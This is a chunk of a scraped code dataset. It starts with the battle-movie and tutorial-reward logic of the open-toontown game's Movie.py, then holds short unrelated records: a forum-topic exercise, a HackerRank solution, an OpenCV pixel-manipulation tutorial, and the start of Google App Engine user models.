MovieToonVictory.doToonVictory(self.battle.localToonActive(), self.battle.activeToons, self.toonRewardIds, self.toonRewardDicts, self.deathList, self.rewardPanel, 1, self.uberList, self.helpfulToonsList, noSkip=noSkip)\n if victory:\n skipper.setIvals((ptrack, camtrack), ptrack.getDuration())\n ptrack.append(victory)\n camtrack.append(camVictory)\n ptrack.append(Func(callback))\n self._deleteTrack()\n self.track = Sequence(ptrack, name='movie-reward-track-%d' % self.battle.doId)\n if self.battle.localToonActive():\n self.track = Parallel(self.track, camtrack, name='movie-reward-track-with-cam-%d' % self.battle.doId)\n self.track.delayDeletes = []\n for t in self.battle.activeToons:\n self.track.delayDeletes.append(DelayDelete.DelayDelete(t, 'Movie.playReward'))\n\n skipper.setIvals((self.track,), 0.0)\n skipper.setBattle(self.battle)\n self.track.start(ts)\n return None\n\n def playTutorialReward(self, ts, name, callback):\n self.rewardHasBeenReset = 0\n self.rewardPanel = RewardPanel.RewardPanel(name)\n self.rewardCallback = callback\n self.questList = self.rewardPanel.getQuestIntervalList(base.localAvatar, [0,\n 1,\n 1,\n 0], [base.localAvatar], base.localAvatar.quests[0], [], [base.localAvatar.getDoId()])\n camera.setPosHpr(0, 8, base.localAvatar.getHeight() * 0.66, 179, 15, 0)\n self.playTutorialReward_1()\n\n def playTutorialReward_1(self):\n self.tutRewardDialog_1 = TTDialog.TTDialog(text=TTLocalizer.MovieTutorialReward1, command=self.playTutorialReward_2, style=TTDialog.Acknowledge, fadeScreen=None, pos=(0.65, 0, 0.5), scale=0.8)\n self.tutRewardDialog_1.hide()\n self._deleteTrack()\n self.track = Sequence(name='tutorial-reward-1')\n self.track.append(Func(self.rewardPanel.initGagFrame, base.localAvatar, [0,\n 0,\n 0,\n 0,\n 0,\n 0,\n 0], [0,\n 0,\n 0,\n 0], noSkip=True))\n self.track += self.rewardPanel.getTrackIntervalList(base.localAvatar, THROW_TRACK, 0, 1, 0)\n self.track.append(Func(self.tutRewardDialog_1.show))\n self.track.start()\n return\n\n def playTutorialReward_2(self, value):\n self.tutRewardDialog_1.cleanup()\n self.tutRewardDialog_2 = TTDialog.TTDialog(text=TTLocalizer.MovieTutorialReward2, command=self.playTutorialReward_3, style=TTDialog.Acknowledge, fadeScreen=None, pos=(0.65, 0, 0.5), scale=0.8)\n self.tutRewardDialog_2.hide()\n self._deleteTrack()\n self.track = Sequence(name='tutorial-reward-2')\n self.track.append(Wait(1.0))\n self.track += self.rewardPanel.getTrackIntervalList(base.localAvatar, SQUIRT_TRACK, 0, 1, 0)\n self.track.append(Func(self.tutRewardDialog_2.show))\n self.track.start()\n return\n\n def playTutorialReward_3(self, value):\n self.tutRewardDialog_2.cleanup()\n from toontown.toon import Toon\n from toontown.toon import ToonDNA\n\n def doneChat1(page, elapsed = 0):\n self.track2.start()\n\n def doneChat2(elapsed):\n self.track2.pause()\n self.track3.start()\n\n def uniqueName(hook):\n return 'TutorialTom-' + hook\n\n self.tutorialTom = Toon.Toon()\n dna = ToonDNA.ToonDNA()\n dnaList = ('dll', 'ms', 'm', 'm', 7, 0, 7, 7, 2, 6, 2, 6, 2, 16)\n dna.newToonFromProperties(*dnaList)\n self.tutorialTom.setDNA(dna)\n self.tutorialTom.setName(TTLocalizer.NPCToonNames[20000])\n self.tutorialTom.uniqueName = uniqueName\n if base.config.GetString('language', 'english') == 'japanese':\n self.tomDialogue03 = base.loader.loadSfx('phase_3.5/audio/dial/CC_tom_movie_tutorial_reward01.ogg')\n self.tomDialogue04 = base.loader.loadSfx('phase_3.5/audio/dial/CC_tom_movie_tutorial_reward02.ogg')\n self.tomDialogue05 = base.loader.loadSfx('phase_3.5/audio/dial/CC_tom_movie_tutorial_reward03.ogg')\n self.musicVolume = base.config.GetFloat('tutorial-music-volume', 0.5)\n else:\n self.tomDialogue03 = None\n self.tomDialogue04 = None\n self.tomDialogue05 = None\n self.musicVolume = 0.9\n music = base.cr.playGame.place.loader.battleMusic\n if self.questList:\n self.track1 = Sequence(Wait(1.0), Func(self.rewardPanel.initQuestFrame, base.localAvatar, copy.deepcopy(base.localAvatar.quests)), Wait(1.0), Sequence(*self.questList), Wait(1.0), Func(self.rewardPanel.hide), Func(camera.setPosHpr, render, 34, 19.88, 3.48, -90, -2.36, 0), Func(base.localAvatar.animFSM.request, 'neutral'), Func(base.localAvatar.setPosHpr, 40.31, 22.0, -0.47, 150.0, 360.0, 0.0), Wait(0.5), Func(self.tutorialTom.reparentTo, render), Func(self.tutorialTom.show), Func(self.tutorialTom.setPosHpr, 40.29, 17.9, -0.47, 11.31, 0.0, 0.07), Func(self.tutorialTom.animFSM.request, 'TeleportIn'), Wait(1.517), Func(self.tutorialTom.animFSM.request, 'neutral'), Func(self.acceptOnce, self.tutorialTom.uniqueName('doneChatPage'), doneChat1), Func(self.tutorialTom.addActive), Func(music.setVolume, self.musicVolume), Func(self.tutorialTom.setLocalPageChat, TTLocalizer.MovieTutorialReward3, 0, None, [self.tomDialogue03]), name='tutorial-reward-3a')\n self.track2 = Sequence(Func(self.acceptOnce, self.tutorialTom.uniqueName('doneChatPage'), doneChat2), Func(self.tutorialTom.setLocalPageChat, TTLocalizer.MovieTutorialReward4, 1, None, [self.tomDialogue04]), Func(self.tutorialTom.setPlayRate, 1.5, 'right-hand-start'), Func(self.tutorialTom.play, 'right-hand-start'), Wait(self.tutorialTom.getDuration('right-hand-start') / 1.5), Func(self.tutorialTom.loop, 'right-hand'), name='tutorial-reward-3b')\n self.track3 = Parallel(Sequence(Func(self.tutorialTom.setPlayRate, -1.8, 'right-hand-start'), Func(self.tutorialTom.play, 'right-hand-start'), Wait(self.tutorialTom.getDuration('right-hand-start') / 1.8), Func(self.tutorialTom.animFSM.request, 'neutral'), name='tutorial-reward-3ca'), Sequence(Wait(0.5), Func(self.tutorialTom.setChatAbsolute, TTLocalizer.MovieTutorialReward5, CFSpeech | CFTimeout, self.tomDialogue05), Wait(1.0), Func(self.tutorialTom.animFSM.request, 'TeleportOut'), Wait(self.tutorialTom.getDuration('teleport')), Wait(1.0), Func(self.playTutorialReward_4, 0), name='tutorial-reward-3cb'), name='tutorial-reward-3c')\n self.track1.start()\n else:\n self.playTutorialReward_4(0)\n return\n\n def playTutorialReward_4(self, value):\n base.localAvatar.setH(270)\n self.tutorialTom.removeActive()\n self.tutorialTom.delete()\n self.questList = None\n self.rewardCallback()\n return\n\n def stop(self):\n if self.track:\n self.track.finish()\n self._deleteTrack()\n if hasattr(self, 'track1'):\n self.track1.finish()\n self.track1 = None\n if hasattr(self, 'track2'):\n self.track2.finish()\n self.track2 = None\n if hasattr(self, 'track3'):\n self.track3.finish()\n self.track3 = None\n if self.rewardPanel:\n self.rewardPanel.hide()\n if self.playByPlayText:\n self.playByPlayText.hide()\n return\n\n def __doToonAttacks(self):\n if base.config.GetBool('want-toon-attack-anims', 1):\n track = Sequence(name='toon-attacks')\n camTrack = Sequence(name='toon-attacks-cam')\n ival, camIval = MovieFire.doFires(self.__findToonAttack(FIRE))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieSOS.doSOSs(self.__findToonAttack(SOS))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieNPCSOS.doNPCSOSs(self.__findToonAttack(NPCSOS))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MoviePetSOS.doPetSOSs(self.__findToonAttack(PETSOS))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n hasHealBonus = self.battle.getInteractivePropTrackBonus() == HEAL\n ival, camIval = MovieHeal.doHeals(self.__findToonAttack(HEAL), hasHealBonus)\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieTrap.doTraps(self.__findToonAttack(TRAP))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieLure.doLures(self.__findToonAttack(LURE))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieSound.doSounds(self.__findToonAttack(SOUND))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieThrow.doThrows(self.__findToonAttack(THROW))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieSquirt.doSquirts(self.__findToonAttack(SQUIRT))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieDrop.doDrops(self.__findToonAttack(DROP))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n if len(track) == 0:\n return (None, None)\n else:\n return (track, camTrack)\n else:\n return (None, None)\n return None\n\n def genRewardDicts(self, id0, origExp0, earnedExp0, origQuests0, items0, missedItems0, origMerits0, merits0, parts0, id1, origExp1, earnedExp1, origQuests1, items1, missedItems1, origMerits1, merits1, parts1, id2, origExp2, earnedExp2, origQuests2, items2, missedItems2, origMerits2, merits2, parts2, id3, origExp3, earnedExp3, origQuests3, items3, missedItems3, origMerits3, merits3, parts3, deathList, uberList, helpfulToonsList):\n self.deathList = deathList\n self.helpfulToonsList = helpfulToonsList\n entries = ((id0,\n origExp0,\n earnedExp0,\n origQuests0,\n items0,\n missedItems0,\n origMerits0,\n merits0,\n parts0),\n (id1,\n origExp1,\n earnedExp1,\n origQuests1,\n items1,\n missedItems1,\n origMerits1,\n merits1,\n parts1),\n (id2,\n origExp2,\n earnedExp2,\n origQuests2,\n items2,\n missedItems2,\n origMerits2,\n merits2,\n parts2),\n (id3,\n origExp3,\n earnedExp3,\n origQuests3,\n items3,\n missedItems3,\n origMerits3,\n merits3,\n parts3))\n self.toonRewardDicts = BattleExperience.genRewardDicts(entries)\n self.toonRewardIds = [id0,\n id1,\n id2,\n id3]\n self.uberList = uberList\n\n def genAttackDicts(self, toons, suits, id0, tr0, le0, tg0, hp0, ac0, hpb0, kbb0, died0, revive0, id1, tr1, le1, tg1, hp1, ac1, hpb1, kbb1, died1, revive1, id2, tr2, le2, tg2, hp2, ac2, hpb2, kbb2, died2, revive2, id3, tr3, le3, tg3, hp3, ac3, hpb3, kbb3, died3, revive3, sid0, at0, stg0, dm0, sd0, sb0, st0, sid1, at1, stg1, dm1, sd1, sb1, st1, sid2, at2, stg2, dm2, sd2, sb2, st2, sid3, at3, stg3, dm3, sd3, sb3, st3):\n if self.track and self.track.isPlaying():\n self.notify.warning('genAttackDicts() - track is playing!')\n toonAttacks = ((id0,\n tr0,\n le0,\n tg0,\n hp0,\n ac0,\n hpb0,\n kbb0,\n died0,\n revive0),\n (id1,\n tr1,\n le1,\n tg1,\n hp1,\n ac1,\n hpb1,\n kbb1,\n died1,\n revive1),\n (id2,\n tr2,\n le2,\n tg2,\n hp2,\n ac2,\n hpb2,\n kbb2,\n died2,\n revive2),\n (id3,\n tr3,\n le3,\n tg3,\n hp3,\n ac3,\n hpb3,\n kbb3,\n died3,\n revive3))\n self.__genToonAttackDicts(toons, suits, toonAttacks)\n suitAttacks = ((sid0,\n at0,\n stg0,\n dm0,\n sd0,\n sb0,\n st0),\n (sid1,\n at1,\n stg1,\n dm1,\n sd1,\n sb1,\n st1),\n (sid2,\n at2,\n stg2,\n dm2,\n sd2,\n sb2,\n st2),\n (sid3,\n at3,\n stg3,\n dm3,\n sd3,\n sb3,\n st3))\n self.__genSuitAttackDicts(toons, suits, suitAttacks)\n\n def __genToonAttackDicts(self, toons, suits, toonAttacks):\n for ta in toonAttacks:\n targetGone = 0\n track = ta[TOON_TRACK_COL]\n if track != NO_ATTACK:\n adict = {}\n toonIndex = ta[TOON_ID_COL]\n toonId = toons[toonIndex]\n toon = self.battle.findToon(toonId)\n if toon == None:\n continue\n level = ta[TOON_LVL_COL]\n adict['toon'] = toon\n adict['track'] = track\n adict['level'] = level\n hps = ta[TOON_HP_COL]\n kbbonuses = ta[TOON_KBBONUS_COL]\n if track == NPCSOS:\n adict['npcId'] = ta[TOON_TGT_COL]\n toonId = ta[TOON_TGT_COL]\n track, npc_level, npc_hp = NPCToons.getNPCTrackLevelHp(adict['npcId'])\n if track == None:\n track = NPCSOS\n adict['track'] = track\n adict['level'] = npc_level\n elif track == PETSOS:\n petId = ta[TOON_TGT_COL]\n adict['toonId'] = toonId\n adict['petId'] = petId\n if track == SOS:\n targetId = ta[TOON_TGT_COL]\n if targetId == base.localAvatar.doId:\n target = base.localAvatar\n adict['targetType'] = 'callee'\n elif toon == base.localAvatar:\n target = base.cr.identifyAvatar(targetId)\n adict['targetType'] = 'caller'\n else:\n target = None\n adict['targetType'] = 'observer'\n adict['target'] = target\n elif track == NPCSOS or track == NPC_COGS_MISS or track == NPC_TOONS_HIT or track == NPC_RESTOCK_GAGS or track == PETSOS:\n adict['special'] = 1\n toonHandles = []\n for t in toons:\n if t != -1:\n target = self.battle.findToon(t)\n if target == None:\n continue\n if track == NPC_TOONS_HIT and t == toonId:\n continue\n toonHandles.append(target)\n\n adict['toons'] = toonHandles\n suitHandles = []\n for s in suits:\n if s != -1:\n target = self.battle.findSuit(s)\n if target == None:\n continue\n suitHandles.append(target)\n\n adict['suits'] = suitHandles\n if track == PETSOS:\n del adict['special']\n targets = []\n for t in toons:\n if t != -1:\n target = self.battle.findToon(t)\n if target == None:\n continue\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[toons.index(t)]\n self.notify.debug('PETSOS: toon: %d healed for hp: %d' % (target.doId, hps[toons.index(t)]))\n targets.append(tdict)\n\n if len(targets) > 0:\n adict['target'] = targets\n elif track == HEAL:\n if levelAffectsGroup(HEAL, level):\n targets = []\n for t in toons:\n if t != toonId and t != -1:\n target = self.battle.findToon(t)\n if target == None:\n continue\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[toons.index(t)]\n self.notify.debug('HEAL: toon: %d healed for hp: %d' % (target.doId, hps[toons.index(t)]))\n targets.append(tdict)\n\n if len(targets) > 0:\n adict['target'] = targets\n else:\n targetGone = 1\n else:\n targetIndex = ta[TOON_TGT_COL]\n if targetIndex < 0:\n targetGone = 1\n else:\n targetId = toons[targetIndex]\n target = self.battle.findToon(targetId)\n if target != None:\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[targetIndex]\n adict['target'] = tdict\n else:\n targetGone = 1\n elif attackAffectsGroup(track, level, ta[TOON_TRACK_COL]):\n targets = []\n for s in suits:\n if s != -1:\n target = self.battle.findSuit(s)\n if ta[TOON_TRACK_COL] == NPCSOS:\n if track == LURE and self.battle.isSuitLured(target) == 1:\n continue\n elif track == TRAP and (self.battle.isSuitLured(target) == 1 or target.battleTrap != NO_TRAP):\n continue\n targetIndex = suits.index(s)\n sdict = {}\n sdict['suit'] = target\n sdict['hp'] = hps[targetIndex]\n if ta[TOON_TRACK_COL] == NPCSOS and track == DROP and hps[targetIndex] == 0:\n continue\n sdict['kbbonus'] = kbbonuses[targetIndex]\n sdict['died'] = ta[SUIT_DIED_COL] & 1 << targetIndex\n sdict['revived'] = ta[SUIT_REVIVE_COL] & 1 << targetIndex\n if sdict['died'] != 0:\n pass\n sdict['leftSuits'] = []\n sdict['rightSuits'] = []\n targets.append(sdict)\n\n adict['target'] = targets\n else:\n targetIndex = ta[TOON_TGT_COL]\n if targetIndex < 0:\n targetGone = 1\n else:\n targetId = suits[targetIndex]\n target = self.battle.findSuit(targetId)\n sdict = {}\n sdict['suit'] = target\n if self.battle.activeSuits.count(target) == 0:\n targetGone = 1\n suitIndex = 0\n else:\n suitIndex = self.battle.activeSuits.index(target)\n leftSuits = []\n for si in range(0, suitIndex):\n asuit = self.battle.activeSuits[si]\n if self.battle.isSuitLured(asuit) == 0:\n leftSuits.append(asuit)\n\n lenSuits = len(self.battle.activeSuits)\n rightSuits = []\n if lenSuits > suitIndex + 1:\n for si in range(suitIndex + 1, lenSuits):\n asuit = self.battle.activeSuits[si]\n if self.battle.isSuitLured(asuit) == 0:\n rightSuits.append(asuit)\n\n sdict['leftSuits'] = leftSuits\n sdict['rightSuits'] = rightSuits\n sdict['hp'] = hps[targetIndex]\n sdict['kbbonus'] = kbbonuses[targetIndex]\n sdict['died'] = ta[SUIT_DIED_COL] & 1 << targetIndex\n sdict['revived'] = ta[SUIT_REVIVE_COL] & 1 << targetIndex\n if sdict['revived'] != 0:\n pass\n if sdict['died'] != 0:\n pass\n if track == DROP or track == TRAP:\n adict['target'] = [sdict]\n else:\n adict['target'] = sdict\n adict['hpbonus'] = ta[TOON_HPBONUS_COL]\n adict['sidestep'] = ta[TOON_ACCBONUS_COL]\n if 'npcId' in adict:\n adict['sidestep'] = 0\n adict['battle'] = self.battle\n adict['playByPlayText'] = self.playByPlayText\n if targetGone == 0:\n self.toonAttackDicts.append(adict)\n else:\n self.notify.warning('genToonAttackDicts() - target gone!')\n\n def compFunc(a, b):\n alevel = a['level']\n blevel = b['level']\n if alevel > blevel:\n return 1\n elif alevel < blevel:\n return -1\n return 0\n\n self.toonAttackDicts.sort(key=functools.cmp_to_key(compFunc))\n return\n\n def __findToonAttack(self, track):\n setCapture = 0\n tp = []\n for ta in self.toonAttackDicts:\n if ta['track'] == track or track == NPCSOS and 'special' in ta:\n tp.append(ta)\n if track == SQUIRT:\n setCapture = 1\n\n if track == TRAP:\n sortedTraps = []\n for attack in tp:\n if 'npcId' not in attack:\n sortedTraps.append(attack)\n\n for attack in tp:\n if 'npcId' in attack:\n sortedTraps.append(attack)\n\n tp = sortedTraps\n if setCapture:\n pass\n return tp\n\n def __genSuitAttackDicts(self, toons, suits, suitAttacks):\n for sa in suitAttacks:\n targetGone = 0\n attack = sa[SUIT_ATK_COL]\n if attack != NO_ATTACK:\n suitIndex = sa[SUIT_ID_COL]\n suitId = suits[suitIndex]\n suit = self.battle.findSuit(suitId)\n if suit == None:\n self.notify.error('suit: %d not in battle!' % suitId)\n adict = getSuitAttack(suit.getStyleName(), suit.getLevel(), attack)\n adict['suit'] = suit\n adict['battle'] = self.battle\n adict['playByPlayText'] = self.playByPlayText\n adict['taunt'] = sa[SUIT_TAUNT_COL]\n hps = sa[SUIT_HP_COL]\n if adict['group'] == ATK_TGT_GROUP:\n targets = []\n for t in toons:\n if t != -1:\n target = self.battle.findToon(t)\n if target == None:\n continue\n targetIndex = toons.index(t)\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[targetIndex]\n self.notify.debug('DAMAGE: toon: %d hit for hp: %d' % (target.doId, hps[targetIndex]))\n toonDied = sa[TOON_DIED_COL] & 1 << targetIndex\n tdict['died'] = toonDied\n targets.append(tdict)\n\n if len(targets) > 0:\n adict['target'] = targets\n else:\n targetGone = 1\n elif adict['group'] == ATK_TGT_SINGLE:\n targetIndex = sa[SUIT_TGT_COL]\n targetId = toons[targetIndex]\n target = self.battle.findToon(targetId)\n if target == None:\n targetGone = 1\n break\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[targetIndex]\n self.notify.debug('DAMAGE: toon: %d hit for hp: %d' % (target.doId, hps[targetIndex]))\n toonDied = sa[TOON_DIED_COL] & 1 << targetIndex\n tdict['died'] = toonDied\n toonIndex = self.battle.activeToons.index(target)\n rightToons = []\n for ti in range(0, toonIndex):\n rightToons.append(self.battle.activeToons[ti])\n\n lenToons = len(self.battle.activeToons)\n leftToons = []\n if lenToons > toonIndex + 1:\n for ti in range(toonIndex + 1, lenToons):\n leftToons.append(self.battle.activeToons[ti])\n\n tdict['leftToons'] = leftToons\n tdict['rightToons'] = rightToons\n adict['target'] = tdict\n else:\n self.notify.warning('got suit attack not group or single!')\n if targetGone == 0:\n self.suitAttackDicts.append(adict)\n else:\n self.notify.warning('genSuitAttackDicts() - target gone!')\n\n return\n\n def __doSuitAttacks(self):\n if base.config.GetBool('want-suit-anims', 1):\n track = Sequence(name='suit-attacks')\n camTrack = Sequence(name='suit-attacks-cam')\n isLocalToonSad = False\n for a in self.suitAttackDicts:\n ival, camIval = MovieSuitAttacks.doSuitAttack(a)\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n targetField = a.get('target')\n if targetField is None:\n continue\n if a['group'] == ATK_TGT_GROUP:\n for target in targetField:\n if target['died'] and target['toon'].doId == base.localAvatar.doId:\n isLocalToonSad = True\n\n elif a['group'] == ATK_TGT_SINGLE:\n if targetField['died'] and targetField['toon'].doId == base.localAvatar.doId:\n isLocalToonSad = True\n if isLocalToonSad:\n break\n\n if len(track) == 0:\n return (None, None)\n return (track, camTrack)\n else:\n return (None, None)\n return\n","repo_name":"open-toontown/open-toontown","sub_path":"toontown/battle/Movie.py","file_name":"Movie.py","file_ext":"py","file_size_in_byte":37134,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"84"} +{"seq_id":"37679730592","text":"counter = int(input())\nnum = 0\nd = {}\nwhile counter > num:\n num += 1\n inp = input()\n if inp == '0':\n for i in range(2):\n if i == 0:\n theme = input()\n d[num] = theme\n else:\n input()\n else:\n d[num] = int(inp)\n input()\n\n\ndef find(key):\n if type(key) == str:\n return key\n else:\n return find(d[key])\n\n\nsum_dic = {}\n\nfor value in d.values():\n if type(value) == str and value not in sum_dic.keys():\n sum_dic[value] = 1\n else:\n val = find(value)\n sum_dic[val] += 1\n\nsum_dic_list = sorted([(value, key) for key, value in sum_dic.items()], reverse=True)\nmax_el = sum_dic_list[0][0]\n\nmax_list = []\n\nfor key, value in sum_dic.items():\n if value == max_el:\n max_list.append(key)\n\nresult = []\n\nfor key, value in d.items():\n if value in max_list:\n result.append(key)\nprint(d[min(result)])","repo_name":"Constanter/yandex_algorithm_training","sub_path":"homework_4/E_forum.py","file_name":"E_forum.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"39515198290","text":"# The question for this solution can be found at https://www.hackerrank.com/challenges/minimum-distances/problem\n\ndef minimumDistances(a):\n\tminValues = []\n\t\n\tfor i in range(len(a) - 1):\n\t\tfor j in range(i + 1, len(a)):\n\t\t\tif a[j] == a[i]:\n\t\t\t\tminValues.append(abs(j-i))\n\t\t\t\tbreak\n\t\n\tif len(minValues) == 0:\n\t\treturn -1\n\treturn min(minValues)\n\t\na = list(map(int, input().rstrip().split()))\nprint(minimumDistances(a))","repo_name":"pranavj1001/CompetitiveProgramming","sub_path":"Python/minimumDistances.py","file_name":"minimumDistances.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"2116459241","text":"import cv2\r\nimport numpy as np\r\n\r\nimagenObscura = np.zeros((100,100,3), np.uint8) #Creamos una matriz de 3 dimensiones y la llenamos con ceros \r\n#(100,100,3) -> Imagen de 100 x 100 con 3 canales \r\n\r\npixel = imagenObscura[97,97] #Obtenemos el valor del pixel en la posicion 97,97 de la matriz general \r\n\"\"\"Nos devuelve un vector de 3 elementos \"\"\"\r\nprint(pixel) #Imprimimos el valor del pixel\r\n\r\nimagenObscura[30,60] = [255, 255, 255] #Reemplazamos el valor del pixel en la posicon 97, 97 y lo hacemos de color blanco \r\npixel = imagenObscura[30,60]\r\nprint(pixel) \r\n\r\n\"\"\"Obtener las dimensiones de la imagen generada, utilizaremos la funcion shape\"\"\" \r\nalto, largo, canales = imagenObscura.shape\r\nprint(alto, largo, canales)\r\n\r\n\"\"\"Recorremos la imagen imprimiendo los valores de cada pixel\"\"\"\r\nfor i in range(largo):\r\n for j in range(alto):\r\n print(imagenObscura[i,j])\r\n\r\n\"\"\"Modificar los valores de cada pixel\"\"\"\r\nfor i in range(largo):\r\n for j in range(alto):\r\n pixel = imagenObscura[i,j]\r\n if pixel[0] == 0 and pixel[1] == 0 and pixel[2] == 0:\r\n imagenObscura[i,j] = [0,255,230]\r\n\r\ncv2.namedWindow(\"block\", cv2.WINDOW_NORMAL)\r\ncv2.imshow(\"block\", imagenObscura)\r\n\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n\r\n\"\"\" APLICAR SLICING A LISTAS Y VECTORES \"\"\"\r\nlista = [1,2,8,9,5,1,6,56,4,8]\r\n\r\nfor elemento in lista:\r\n print(elemento)\r\n\r\nprint(lista[:]) #Muestra toda la lista \r\nprint (lista[0:]) #Muestra toda la lista desde la posicion 0 hasta el final\r\nprint((lista[5:])) #Muestra la lista desde la posicion 5 hasta el final\r\nprint(lista[::-1]) #Muestra toda la lista de forma descendente \r\n\r\nlista[5:] = [1,1,1,1,1,1]\r\nprint(lista) #Muestra toda lista y despues de la posicion 5 reemplaza los valores por '1'\r\n\r\nlista[:] = [1,1,1,1,1,1]\r\nprint(lista)\r\nprint(lista[5:9])\r\n\r\n\"\"\"TRABAJANDO CON LA IMAGEN CANDADOS.JPG\"\"\"\r\npath = r'C:\\Users\\User\\Desktop\\PDI\\opencv\\candados.jpg'\r\nimg =cv2.imread(path) #Leemos la imagen de entrada y la guardamos en la variable img\r\nalto, largo, _ = img.shape #Obtenemos las dimensiones de la imagen \r\nprint(alto,largo) #Imprimimos sus dimensiones \r\n\r\n#Extraemos la imagen del candado 1\r\ncandado1 = img[0:alto, 0:int(largo/2)] #Obtenemos los pixeles comprendidos desde 0 al total del alto de la imagen \r\n# y asu vez hasta la mitad del largo de la misma.\r\ncandado2 = img[0:alto, int(largo/2):] #Obtenemos los pixeles comprendidos desde 0 al total del alto de la imagen \r\n# y asi vez desde la mitad del largo de la misma hasta el final del largo\r\n\r\n#Generamos la imagen compuesta con las mismas dimensiones que la original y la rellenamos con ceros \r\nimagenCompuesta = np.zeros((alto, largo, 3), np.uint8)\r\n#Rellenamos la imagen \r\nimagenCompuesta[0:alto, 0:int(largo/2)] = candado2 #Reemplazamos los pixeles de la primer mitad con la imagen del candado2 \r\nimagenCompuesta[0:alto, int(largo/2):] = candado1 #Reemplazamos los pixeles de la segunda mitad con la imagen del candado1\r\n\r\ncv2.namedWindow(\"Original\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"candado1\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"candado2\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"Imagen Compuesta\", cv2.WINDOW_NORMAL)\r\n\r\ncv2.imshow(\"Original\", img)\r\ncv2.imshow(\"candado1\", candado1)\r\ncv2.imshow(\"candado2\", candado2)\r\ncv2.imshow(\"Imagen Compuesta\", imagenCompuesta)\r\n\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n\r\n\"\"\"TRABAJANDO CON EL COMANDO SELECT ROI\"\"\"\r\npath = r'C:\\Users\\User\\Desktop\\PDI\\opencv\\candados.jpg'\r\nimg =cv2.imread(path) #Leemos la imagen de entrada y la guardamos en la variable img\r\nimgCopy = img.copy()\r\n\r\nalto, largo, canales = img.shape\r\n\r\ncv2.namedWindow(\"ROI\", cv2.WINDOW_NORMAL)\r\n\r\nroi1 = cv2.selectROI(\"ROI\", img)\r\nprint(roi1)\r\n\r\ncandado1 = img[int(roi1[1]) : int(roi1[1]+roi1[3]), int(roi1[0]) : int(roi1[0]+roi1[2])]\r\nalto1, largo1, _ = candado1.shape\r\nroi2 = cv2.selectROI(\"ROI\", img)\r\nprint(roi2)\r\n\r\ncandado2 = img[int(roi2[1]) : int(roi2[1]+roi2[3]), int(roi2[0]) : int(roi2[0]+roi2[2])]\r\nalto2, largo2, _ = candado2.shape\r\n\r\nnewCandado1 = cv2.resize(candado1, (largo2, alto2))\r\nnewCandado2 = cv2.resize(candado2, (largo1, alto1))\r\n\r\nimgCopy[int(roi1[1]) : int(roi1[1]+ roi1[3]), int(roi1[0]) : int(roi1[0]+ roi1[2])] = newCandado2\r\nimgCopy[int(roi2[1]) : int(roi2[1]+ roi2[3]), int(roi2[0]) : int(roi2[0]+ roi2[2])] = newCandado1 \r\n \r\n\r\ncv2.namedWindow(\"original\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"candado1\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"candado2\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"imgCompuesta\", cv2.WINDOW_NORMAL)\r\n\r\ncv2.imshow(\"original\", img)\r\ncv2.imshow(\"candado1\", candado1)\r\ncv2.imshow(\"candado2\", candado2)\r\ncv2.imshow(\"imgCompuesta\", imgCopy)\r\n\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n","repo_name":"alejandradelacruz/PDI","sub_path":"opencv/pixeles.py","file_name":"pixeles.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"8228373354","text":"import logging\nimport os\nimport random\nimport urllib\nimport hashlib\nfrom google.appengine.ext import db\nfrom google.appengine.api import users\nfrom time import mktime\n\nclass ExternalUser(db.Model):\n type = db.StringProperty(required=True)\n external_user_id = db.StringProperty(required=True)\n username = db.StringProperty()\n avatar_url = db.StringProperty()\n subscribers = db.ListProperty(db.Key)\n nr_of_subscribers = db.IntegerProperty(default=0)\n last_updated = db.DateTimeProperty(auto_now_add=True)\n get_last_updated = db.BooleanProperty(default=True)\n last_checked = db.DateTimeProperty(auto_now_add=True)\n\nclass YoutifyUser(db.Model):\n created = db.DateTimeProperty(auto_now_add=True)\n last_login = db.DateTimeProperty()\n device = db.StringProperty()\n\n google_user = db.UserProperty()\n google_user2 = db.UserProperty()\n lastfm_user_name = db.StringProperty()\n lastfm_access_token = db.StringProperty()\n lastfm_scrobble_automatically = db.BooleanProperty(default=True)\n youtube_username = db.StringProperty()\n dropbox_access_token = db.StringProperty()\n dropbox_user_name = db.StringProperty()\n\n nickname = db.StringProperty()\n nickname_lower = db.StringProperty()\n first_name = db.StringProperty()\n last_name = db.StringProperty()\n tagline = db.StringProperty()\n playlists = db.ListProperty(db.Key)\n playlist_subscriptions = db.ListProperty(db.Key)\n last_notification_seen_timestamp = db.StringProperty()\n external_user_subscriptions = 